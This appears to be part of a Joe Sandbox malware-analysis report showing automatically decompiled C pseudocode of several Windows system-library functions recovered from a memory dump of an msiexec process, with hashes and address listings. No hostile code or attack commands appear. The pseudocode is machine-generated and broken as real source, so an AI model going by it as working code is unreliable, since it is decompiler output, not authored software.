                              0x04d69cd5
                              0x04d18b17
                              0x04d18b1a
                              0x04d18b1a
                              0x00000000
                              0x04d18ad5
                              0x04d18a89

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cf5849f46dd01e47d38de92b998018dab1040bf2da63c6caa88944edcccc8ae4
                              • Instruction ID: 4cd414b72bd776c1232b0462256dafe808d1308d8cfd2a772df3072e236b6b72
                              • Opcode Fuzzy Hash: cf5849f46dd01e47d38de92b998018dab1040bf2da63c6caa88944edcccc8ae4
                              • Instruction Fuzzy Hash: 9A4152B1B00228ABDB24DF55E888AA9B7F4FF54300F1045EAEC1997251E770EE80DF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DCFDE2 Relevance: .1, Instructions: 116COMMON
                              Download Yara Rule
                              C-Code - Quality: 76%
                              			E04DCFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E04DCFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E04DD0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E04D27D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E04DC1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E04DD2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E04DCC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E04DCDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E04D27D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E04DCA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                              0x04dcfde7
                              0x04dcfde8
                              0x04dcfdec
                              0x04dcfdee
                              0x04dcfdf5
                              0x04dcfdf7
                              0x04dcfdfc
                              0x04dcfe19
                              0x04dcfe22
                              0x04dcfe26
                              0x04dcfec6
                              0x04dcfecd
                              0x04dcfed5
                              0x04dcfee7
                              0x04dcfed7
                              0x04dcfee0
                              0x04dcfee0
                              0x04dcfeef
                              0x04dcff00
                              0x04dcff02
                              0x04dcff07
                              0x04dcff07
                              0x00000000
                              0x04dcfeef
                              0x04dcfe33
                              0x04dcfe55
                              0x04dcfe59
                              0x04dcfe5b
                              0x04dcfe5e
                              0x04dcfe69
                              0x04dcfe6d
                              0x04dcfe6d
                              0x04dcfe69
                              0x04dcfe35
                              0x04dcfe41
                              0x04dcfe41
                              0x04dcfe79
                              0x04dcfe8b
                              0x04dcfe7b
                              0x04dcfe84
                              0x04dcfe84
                              0x04dcfe93
                              0x00000000
                              0x04dcfea8
                              0x04dcfeba
                              0x00000000
                              0x04dcfeba
                              0x04dcfdfe
                              0x04dcfe01
                              0x04dcfe02
                              0x04dcfe08
                              0x04dcff0c
                              0x04dcff14
                              0x04dcff14

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                              • Instruction ID: d4ca6158a158a3d8f8c10765e970073606cba86c49504c8a1c2850cb746c8f10
                              • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                              • Instruction Fuzzy Hash: 6E31D632300642AFD7229B68C854FAA7BABFFC5754F18455DE8858B782DA75FC41C720
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DCEA55 Relevance: .1, Instructions: 111COMMON
                              Download Yara Rule
                              C-Code - Quality: 70%
                              			E04DCEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E04D22280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E04DCE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E04D0F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E04D1FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E04DCAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E04DCBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E04D27D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E04DBFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E04D1FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E04DCA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                              0x04dcea55
                              0x04dcea66
                              0x04dcea68
                              0x04dcea6c
                              0x04dcea6f
                              0x04dcea72
                              0x04dcea75
                              0x04dcea7a
                              0x04dcea7a
                              0x04dcea7e
                              0x04dcea80
                              0x04dcea85
                              0x04dcea8b
                              0x04dceab5
                              0x04dceabc
                              0x04dceabf
                              0x04dceabf
                              0x04dceaca
                              0x04dceace
                              0x04dcead0
                              0x04dceae4
                              0x04dceaeb
                              0x04dceaf0
                              0x04dceaf5
                              0x04dceb09
                              0x04dceb0d
                              0x04dceb1d
                              0x04dceb2d
                              0x04dceb38
                              0x04dceb3d
                              0x04dceb41
                              0x04dceb4a
                              0x04dceb60
                              0x04dceb4c
                              0x04dceb52
                              0x04dceb59
                              0x04dceb59
                              0x04dceb68
                              0x04dceb71
                              0x04dceb71
                              0x04dcea8d
                              0x04dcea8f
                              0x04dcea92
                              0x04dcea97
                              0x04dcea97
                              0x04dcea9b
                              0x04dcea9c
                              0x04dcea9e
                              0x04dceaa6
                              0x04dceaa6
                              0x04dceb7e

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                              • Instruction ID: 6345c63fcb40d5929de409a5948677173cd82e2c471451577c1be883063b587c
                              • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                              • Instruction Fuzzy Hash: D6317272704706AFD719DF24C980A6BB7AAFFC4214F04492EF55687640DA31F805CBA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D869A6 Relevance: .1, Instructions: 108COMMON
                              Download Yara Rule
                              C-Code - Quality: 69%
                              			E04D869A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x4dfd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L04D16C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E04D86BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E04D49980() >= 0) {
							E04D22280(_t56, 0x4df8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x4df8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x4df8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E04D0B6F0(0x4cec338, 0x4cec288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E04D49520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E04D495D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E04D1FFB0(_t68, _t77, 0x4df8778);
				}
				_pop(_t78);
				return E04D4B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                              0x04d869b5
                              0x04d869be
                              0x04d869c3
                              0x04d869c9
                              0x04d869cc
                              0x04d869d1
                              0x04d869d3
                              0x04d869de
                              0x04d869e1
                              0x04d869ea
                              0x04d869f6
                              0x04d869fe
                              0x04d86a13
                              0x04d86a14
                              0x04d86a15
                              0x04d86a16
                              0x04d86a1e
                              0x04d86a26
                              0x04d86a31
                              0x04d86a36
                              0x04d86a37
                              0x04d86a40
                              0x04d86a49
                              0x04d86a4a
                              0x04d86a53
                              0x04d86a59
                              0x04d86a5d
                              0x04d86a5e
                              0x04d86a64
                              0x04d86a67
                              0x04d86a6a
                              0x04d86a6d
                              0x04d86a70
                              0x04d86a77
                              0x04d86a7d
                              0x04d86a86
                              0x04d86a89
                              0x04d86a9c
                              0x04d86a9f
                              0x04d86aa2
                              0x04d86aa5
                              0x04d86aaf
                              0x04d86ab1
                              0x04d86ab8
                              0x04d86ab9
                              0x04d86abb
                              0x04d86abe
                              0x04d86ac5
                              0x04d86ac5
                              0x04d86aaf
                              0x04d86a40
                              0x04d86a26
                              0x04d869fe
                              0x04d86ace
                              0x04d86ad0
                              0x04d86ad3
                              0x04d86ad8
                              0x04d86adf
                              0x04d86adf
                              0x04d86ae8
                              0x04d86aef
                              0x04d86aef
                              0x04d86af9
                              0x04d86b06

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 39842d381a0e813d9f34c8310563486bcffd944c723f3d49334dc67202847994
                              • Instruction ID: ce860bc54623f4855eee179b666d694f160938d6350080ce6b026f9b77cbe4b9
                              • Opcode Fuzzy Hash: 39842d381a0e813d9f34c8310563486bcffd944c723f3d49334dc67202847994
                              • Instruction Fuzzy Hash: A3415DB1E00608AFDB24DFA5D940BFEBBF4FF48718F14816AE914A7250DB74A905CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D05210 Relevance: .1, Instructions: 107COMMON
                              Download Yara Rule
                              C-Code - Quality: 85%
                              			E04D05210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E04D052A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04D495D0();
							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E04D1EB70(_t54, 0x4df79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E04D495D0();
								L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E04D1EB70(_t54, 0x4df79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E04D4F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E04D1EB70(_t54, 0x4df79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04D495D0();
							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                              0x04d05220
                              0x04d05224
                              0x04d60d13
                              0x04d60d16
                              0x04d60d19
                              0x04d0522a
                              0x04d0522a
                              0x04d0522d
                              0x04d0522d
                              0x04d05231
                              0x04d05235
                              0x04d05239
                              0x04d60d5c
                              0x04d60d62
                              0x00000000
                              0x00000000
                              0x04d60d6a
                              0x04d60d7b
                              0x04d60d7f
                              0x04d60d81
                              0x04d60d84
                              0x04d60d95
                              0x04d60d95
                              0x04d60d6c
                              0x04d60d71
                              0x04d60d71
                              0x04d60d9a
                              0x00000000
                              0x04d0524a
                              0x04d0524a
                              0x04d05250
                              0x04d60d24
                              0x04d60d35
                              0x04d60d39
                              0x04d60d3b
                              0x04d60d3e
                              0x04d60d50
                              0x04d60d50
                              0x04d60d26
                              0x04d60d2b
                              0x04d60d2b
                              0x00000000
                              0x04d60d55
                              0x04d05256
                              0x04d0525b
                              0x04d05265
                              0x04d60da7
                              0x04d0526b
                              0x04d0526e
                              0x04d05272
                              0x04d60db1
                              0x04d60db4
                              0x04d60dc5
                              0x04d60dc5
                              0x04d05272
                              0x04d05278
                              0x04d0527e
                              0x04d0528a
                              0x04d0528c
                              0x04d0528d
                              0x00000000
                              0x04d05280
                              0x04d05282
                              0x04d05288
                              0x04d0529f
                              0x04d05292
                              0x00000000
                              0x04d05292
                              0x00000000
                              0x04d05288
                              0x04d0527e

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e28fc6e5be73bc098899ee5a49dcedd68d3622387949b3c2b2cda2cecaaefe27
                              • Instruction ID: 0ed1830e82649e30fdf6f6d8cadf82e912a30bc6fde47cb175c70cc365101721
                              • Opcode Fuzzy Hash: e28fc6e5be73bc098899ee5a49dcedd68d3622387949b3c2b2cda2cecaaefe27
                              • Instruction Fuzzy Hash: 6C31E131741611EBD732DF28D990F6677A5FF50764F118B1AE85A0B9E0EB60F800CEA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D43D43 Relevance: .1, Instructions: 106COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D43D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04D17B60(0, _t61, 0x4ce11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04D17B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04D24620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                              0x04d43d4c
                              0x04d43d50
                              0x04d43d55
                              0x04d43d5e
                              0x04d7e79a
                              0x00000000
                              0x04d7e79a
                              0x04d43d68
                              0x04d7e789
                              0x04d43d9d
                              0x04d43da3
                              0x04d43daf
                              0x04d43db5
                              0x04d43dbc
                              0x04d43dc4
                              0x04d43dc9
                              0x04d43dce
                              0x04d7e7ae
                              0x04d7e7ae
                              0x04d43dde
                              0x04d43de2
                              0x04d43de7
                              0x04d43e0d
                              0x04d43e13
                              0x04d43e16
                              0x04d43e1e
                              0x04d43e25
                              0x04d43e28
                              0x00000000
                              0x00000000
                              0x04d43e2a
                              0x04d43e2f
                              0x04d43e37
                              0x04d43e37
                              0x00000000
                              0x04d43e37
                              0x04d43e31
                              0x00000000
                              0x04d43e31
                              0x04d43e20
                              0x04d43e20
                              0x04d43e35
                              0x00000000
                              0x04d43de9
                              0x04d43de9
                              0x04d43de9
                              0x04d43dee
                              0x04d43dfd
                              0x04d43dff
                              0x04d43e02
                              0x04d43e05
                              0x04d43e05
                              0x00000000
                              0x04d43df0
                              0x04d43de7
                              0x04d7e78f
                              0x04d7e794
                              0x04d43d79
                              0x04d43d84
                              0x04d43d89
                              0x04d43d8e
                              0x00000000
                              0x04d7e7a4
                              0x04d43d96
                              0x04d43d9a
                              0x00000000
                              0x04d43d9a
                              0x00000000
                              0x04d7e794
                              0x04d43d6e
                              0x04d43d73
                              0x00000000
                              0x04d7e7b5
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 26c512d925090f7cae913652692b5036cd54b2175c3276bc3f2ebbac89a801f6
                              • Instruction ID: 8469705940ddaea7660a220ff5b5ea5402839c9ccbb16b13efcf48992a8f2caa
                              • Opcode Fuzzy Hash: 26c512d925090f7cae913652692b5036cd54b2175c3276bc3f2ebbac89a801f6
                              • Instruction Fuzzy Hash: F8317A31B05625DBD7288F2ED841A6ABBF5FF95710B05806AE889CB260F730E940DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D3A61C Relevance: .1, Instructions: 106COMMON
                              Download Yara Rule
                              C-Code - Quality: 78%
                              			E04D3A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x4de0220);
				E04D5D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x4df7b9c; // 0x0
				_t55 = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E04D5D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x4df7b10 =  *0x4df7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x4df536c; // 0x3065e80
					if( *_t51 != 0x4df5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x4df5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x4df536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E04D3A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                              0x04d3a61c
                              0x04d3a61e
                              0x04d3a623
                              0x04d3a628
                              0x04d3a62b
                              0x04d3a62d
                              0x04d3a648
                              0x04d3a64a
                              0x04d3a64f
                              0x04d79b44
                              0x04d3a6ec
                              0x04d3a6f1
                              0x04d3a6f1
                              0x04d3a655
                              0x04d3a657
                              0x04d3a65a
                              0x04d3a65d
                              0x04d3a662
                              0x04d3a663
                              0x04d3a667
                              0x04d3a668
                              0x04d3a66d
                              0x04d3a706
                              0x04d3a706
                              0x04d79bda
                              0x04d79be6
                              0x04d79beb
                              0x00000000
                              0x04d79beb
                              0x04d3a679
                              0x04d79b7a
                              0x00000000
                              0x04d79b7a
                              0x04d3a683
                              0x04d3a6f4
                              0x04d3a6f7
                              0x04d3a6f9
                              0x04d3a6fd
                              0x04d3a6a0
                              0x04d3a6a0
                              0x04d3a6ad
                              0x04d3a6af
                              0x04d3a6b4
                              0x04d79ba7
                              0x04d79bac
                              0x00000000
                              0x00000000
                              0x04d79bc6
                              0x04d79bce
                              0x04d79bd1
                              0x04d79bd3
                              0x04d79bd3
                              0x00000000
                              0x04d79bd1
                              0x04d3a6bd
                              0x04d3a6c3
                              0x04d3a6c6
                              0x04d3a6d2
                              0x04d3a701
                              0x04d3a704
                              0x00000000
                              0x04d3a704
                              0x04d3a6d4
                              0x04d3a6d6
                              0x04d3a6d9
                              0x04d3a6db
                              0x04d3a6e1
                              0x04d3a6e6
                              0x04d3a6e8
                              0x04d3a6e8
